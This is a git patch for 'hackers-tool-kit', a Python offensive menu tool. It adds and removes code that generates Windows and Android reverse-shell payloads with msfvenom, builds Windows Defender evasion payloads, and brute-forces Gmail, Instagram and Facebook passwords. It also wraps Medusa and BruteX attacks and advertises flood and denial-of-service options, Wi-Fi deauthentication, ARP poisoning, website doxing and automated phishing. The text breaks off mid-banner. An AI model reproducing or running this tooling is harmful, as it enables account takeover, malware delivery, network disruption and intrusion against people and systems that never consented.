hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') + os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') + os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) + os.system('echo "run\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> handler.rc'.format(f)) + os.system('echo "show options\n" >> handler.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> handler.rc') + os.system('echo "services\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + found = True +mainbanner() +main() From d5a41e4a727ad9e12421583ab1c05cac4d471671 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Thu, 21 Feb 2019 23:03:24 +0100 Subject: [PATCH 017/214] Delete htk.py --- htk.py | 1961 -------------------------------------------------------- 1 file changed, 1961 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 1a47f43..0000000 --- a/htk.py +++ /dev/null @@ -1,1961 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - print N+""" _ _ _ _ _ _ _ - _ _ _ _ _ _ _ - | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ - | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| - | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m - |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ 